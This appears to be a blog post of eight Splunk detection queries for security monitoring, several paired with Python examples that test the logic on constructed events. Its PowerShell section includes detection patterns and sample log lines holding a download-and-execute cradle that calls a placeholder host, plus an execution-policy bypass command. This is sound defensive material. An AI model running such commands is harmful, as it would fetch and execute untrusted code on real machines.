Splunk Use Cases

Posted at 2022-04-29

1- Windows Audit Log Tampering

Check for any tampering done to Windows audit logs.

index=__your_sysmon_index__ (sourcetype=wineventlog AND (EventCode=1102 OR EventCode=1100)) OR (sourcetype=wineventlog AND EventCode=104)
| stats count by _time EventCode Message sourcetype host

2- Finding Large Web Uploads

Find large file uploads that could point to data exfiltration in your network.

index=__your_sysmon_index__ sourcetype=websense*
| where bytes_out > 35000000
| table _time src_ip bytes* uri

3- Detecting Recurring Malware on Host

Use anti-virus logs to detect malware that recurs on a host after it was removed.

index=__your_sysmon_index__ sourcetype=symantec:*
| stats count range(_time) as TimeRange by Risk_Name, Computer_Name
| where TimeRange>1800
| eval TimeRange_In_Hours = round(TimeRange/3600,2), TimeRange_In_Days = round(TimeRange/3600/24,2)

4- Detecting Unencrypted Web Communications

Find unencrypted web communications that could lead to a data breach.

index=__your_sysmon_index__ sourcetype=firewall_data dest_port!=443 app=workday*
| table _time user app bytes* src_ip dest_ip dest_port

5- Finding New Local Admin Accounts

Often an attack will include the creation of a new user, followed by permissions being elevated to an admin level.

index=win_servers sourcetype=windows:security EventCode=4720 OR (EventCode=4732 Administrators)
| transaction Security_ID maxspan=180m
| search EventCode=4720 EventCode=4732
| table _time, EventCode, Security_ID, SamAccountName
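The `transaction Security_ID maxspan=180m | search EventCode=4720 EventCode=4732` step is the core of this use case: it only reports an identity whose account creation (4720) is followed by an Administrators group add (4732) within 180 minutes. The following is an added example, not code from the original post, that implements the same pairing logic in Python over a few constructed Security-log events; the field names (`_time`, `EventCode`, `Security_ID`, `SamAccountName`, `Group`) are assumed to match how the events are extracted in Splunk, and the grouping key `Security_ID` follows the query above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real log data). 4720 = user account created,
# 4732 = member added to a security-enabled local group.
SAMPLE_EVENTS = [
    {"_time": "2022-04-29 09:00:00", "EventCode": 4720, "Security_ID": "S-1-5-21-1-1-1-1105",
     "SamAccountName": "svc_backup2", "Group": ""},
    {"_time": "2022-04-29 09:45:00", "EventCode": 4732, "Security_ID": "S-1-5-21-1-1-1-1105",
     "SamAccountName": "svc_backup2", "Group": "Administrators"},
    # Created in the morning, elevated 5.5 hours later: outside the 180-minute span
    {"_time": "2022-04-29 10:00:00", "EventCode": 4720, "Security_ID": "S-1-5-21-1-1-1-1106",
     "SamAccountName": "jdoe", "Group": ""},
    {"_time": "2022-04-29 15:30:00", "EventCode": 4732, "Security_ID": "S-1-5-21-1-1-1-1106",
     "SamAccountName": "jdoe", "Group": "Administrators"},
    # Existing account added to Administrators with no preceding 4720
    {"_time": "2022-04-29 11:00:00", "EventCode": 4732, "Security_ID": "S-1-5-21-1-1-1-1001",
     "SamAccountName": "admin", "Group": "Administrators"},
]

MAXSPAN = timedelta(minutes=180)  # mirrors maxspan=180m


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def find_new_local_admins(events, maxspan=MAXSPAN):
    """Report identities whose 4720 is followed by an Administrators 4732 within maxspan.

    Mirrors: EventCode=4720 OR (EventCode=4732 Administrators)
             | transaction Security_ID maxspan=180m
             | search EventCode=4720 EventCode=4732
    """
    by_sid = defaultdict(list)
    for e in events:
        is_create = e["EventCode"] == 4720
        is_admin_add = e["EventCode"] == 4732 and e["Group"] == "Administrators"
        if is_create or is_admin_add:
            by_sid[e["Security_ID"]].append(e)

    hits = []
    for sid, evs in by_sid.items():
        evs.sort(key=lambda e: _parse(e["_time"]))
        created_at = None  # open "transaction" started by a 4720
        for e in evs:
            if e["EventCode"] == 4720:
                created_at = _parse(e["_time"])
            elif created_at is not None:  # a 4732 following a 4720 for this SID
                if _parse(e["_time"]) - created_at <= maxspan:
                    hits.append({
                        "Security_ID": sid,
                        "SamAccountName": e["SamAccountName"],
                        "created": created_at.strftime("%Y-%m-%d %H:%M:%S"),
                        "admin_added": e["_time"],
                    })
                created_at = None  # the transaction is closed either way
    return hits


if __name__ == "__main__":
    for hit in find_new_local_admins(SAMPLE_EVENTS):
        print(hit)
```

Only `svc_backup2` is reported: `jdoe` was elevated outside the span and `admin` has no creation event, which is exactly the noise the `maxspan` and the second `search` filter are there to remove.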

6- Finding Interactive Logins From Service Accounts

Most service accounts should never interactively log into servers.

index=systems sourcetype=audit_logs user=svc_*
| stats earliest(_time) as earliest latest(_time) as latest by user, dest
| eval isOutlier=if(earliest >= relative_time(now(), "-1d@d"), 1, 0)
| convert ctime(earliest) ctime(latest)

7- Suspicious PowerShell Commands

Look for script-block logs with commands that try to download external scripts/content or bypass the PowerShell execution policy.

index=windows source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104
AND ((ScriptBlockText=*-noni* *iex* *New-Object*)
  OR (ScriptBlockText=*-ep* *bypass* *-Enc*)
  OR (ScriptBlockText=*powershell* *reg* *add* *HKCU\\software\\microsoft\\windows\\currentversion\\run*)
  OR (ScriptBlockText=*bypass* *-noprofile* *-windowstyle* *hidden* *new-object* *system.net.webclient* *.download*)
  OR (ScriptBlockText=*iex* *New-Object* *Net.WebClient* *.Download*))
| table Computer, ScriptBlockText, UserID
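Each parenthesised group in the query is a set of wildcard tokens that must all be present in one script block, and any one group is enough to flag the event. The following is an added example, not code from the original post, that reproduces that matching in Python over constructed 4104 events so the groups can be unit-tested before they are tuned in Splunk. It assumes the tokens are matched case-insensitively against `ScriptBlockText` (Splunk's wildcard comparison is case-insensitive); the event dictionaries and the sample script blocks are constructed for the example.

```python
import fnmatch

# The five AND-groups from the SPL above, in the same order. Every wildcard in a
# group must match; any matching group flags the script block.
PATTERN_GROUPS = [
    ["*-noni*", "*iex*", "*New-Object*"],
    ["*-ep*", "*bypass*", "*-Enc*"],
    ["*powershell*", "*reg*", "*add*",
     r"*HKCU\software\microsoft\windows\currentversion\run*"],
    ["*bypass*", "*-noprofile*", "*-windowstyle*", "*hidden*",
     "*new-object*", "*system.net.webclient*", "*.download*"],
    ["*iex*", "*New-Object*", "*Net.WebClient*", "*.Download*"],
]


def matching_groups(script_block):
    """Return the indexes of PATTERN_GROUPS whose tokens all occur in script_block."""
    text = script_block.lower()
    return [
        i for i, group in enumerate(PATTERN_GROUPS)
        if all(fnmatch.fnmatchcase(text, pattern.lower()) for pattern in group)
    ]


def triage(events):
    """Mimic the final `table Computer, ScriptBlockText, UserID`, keeping only hits
    and adding which groups fired so an analyst can see why."""
    rows = []
    for e in events:
        groups = matching_groups(e["ScriptBlockText"])
        if groups:
            rows.append((e["Computer"], e["UserID"], groups, e["ScriptBlockText"]))
    return rows


# Constructed sample 4104 events (not real log data).
SAMPLE_4104 = [
    {"Computer": "ws01", "UserID": "S-1-5-21-1-1-1-1107",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"Computer": "ws02", "UserID": "S-1-5-21-1-1-1-1108",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/u.ps1')"},
    {"Computer": "ws03", "UserID": "S-1-5-21-1-1-1-1109",
     "ScriptBlockText": "powershell -ep bypass -Enc <base64-placeholder>"},
    {"Computer": "ws04", "UserID": "S-1-5-21-1-1-1-1110",
     "ScriptBlockText": "Write-Host 'ticket note: user asked about -noprofile'"},
]


if __name__ == "__main__":
    for computer, user, groups, text in triage(SAMPLE_4104):
        print(computer, user, groups, text)
```

Note that the SPL form `ScriptBlockText=*a* *b*` applies the wildcard to the field for the first token and the later tokens as free-text terms; the example deliberately matches every token against `ScriptBlockText`, which is the stricter reading and the one most analysts intend.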

8- Detecting Network and Port Scanning

Look for a high distinct count of destination ports from one source to one destination within a short span of time.

| from datamodel:"Network_Traffic"."All_Traffic"
| stats dc(dest_port) as dc_dest_port by src, dest
| where dc_dest_port > 10
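The query counts distinct destination ports per `src`/`dest` pair over the whole search range, so the "short span of time" is really whatever time picker the search runs under. The following is an added example, not code from the original post, that implements the same `dc(dest_port) by src, dest | where > 10` check in Python and also goes one step further than the query by optionally requiring the distinct ports to fall inside a sliding window, which separates a burst scan from a host that slowly touches many ports over a day. The flow tuples and IP addresses are constructed for the example.

```python
from collections import Counter, defaultdict

PORTS = (21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389)
T0 = 1651200000  # constructed epoch base

# Constructed sample flows: (epoch seconds, src, dest, dest_port). Not real traffic.
SAMPLE_FLOWS = (
    # 10.0.0.5 touches 12 distinct ports on 10.0.0.20 within 12 seconds: scan-like burst
    [(T0 + i, "10.0.0.5", "10.0.0.20", p) for i, p in enumerate(PORTS)]
    # 10.0.0.6 touches the same 12 ports but one per hour over 12 hours
    + [(T0 + i * 3600, "10.0.0.6", "10.0.0.20", p) for i, p in enumerate(PORTS)]
    # 10.0.0.7 is a busy but normal client: many flows, very few ports
    + [(T0 + i, "10.0.0.7", "10.0.0.20", 443) for i in range(30)]
    + [(T0 + 100, "10.0.0.7", "10.0.0.21", 80)]
)


def _max_distinct_in_window(events, window_seconds):
    """Largest number of distinct ports seen within any window_seconds-wide interval.

    events: list of (time, port) for one src/dest pair.
    window_seconds=None reproduces plain dc(dest_port) over the whole range.
    """
    events = sorted(events)
    if window_seconds is None:
        return len({port for _, port in events})
    in_window = Counter()  # port -> occurrences currently inside the window
    best, left = 0, 0
    for t, port in events:
        in_window[port] += 1
        # slide the left edge forward until the window is at most window_seconds wide
        while t - events[left][0] > window_seconds:
            old = events[left][1]
            in_window[old] -= 1
            if in_window[old] == 0:
                del in_window[old]
            left += 1
        best = max(best, len(in_window))
    return best


def port_scan_candidates(flows, threshold=10, window_seconds=None):
    """Return {(src, dest): distinct_port_count} for pairs above the threshold.

    Mirrors: stats dc(dest_port) as dc_dest_port by src, dest | where dc_dest_port > 10
    """
    by_pair = defaultdict(list)
    for t, src, dest, port in flows:
        by_pair[(src, dest)].append((t, port))
    result = {}
    for pair, evs in by_pair.items():
        dc = _max_distinct_in_window(evs, window_seconds)
        if dc > threshold:
            result[pair] = dc
    return result


if __name__ == "__main__":
    print("whole range:", port_scan_candidates(SAMPLE_FLOWS))
    print("60 s window:", port_scan_candidates(SAMPLE_FLOWS, window_seconds=60))
```

Over the whole range both 10.0.0.5 and 10.0.0.6 exceed the threshold; with a 60-second window only the burst from 10.0.0.5 remains. In Splunk the equivalent tightening is to run the search over a short time range or to bucket `_time` before the `stats`.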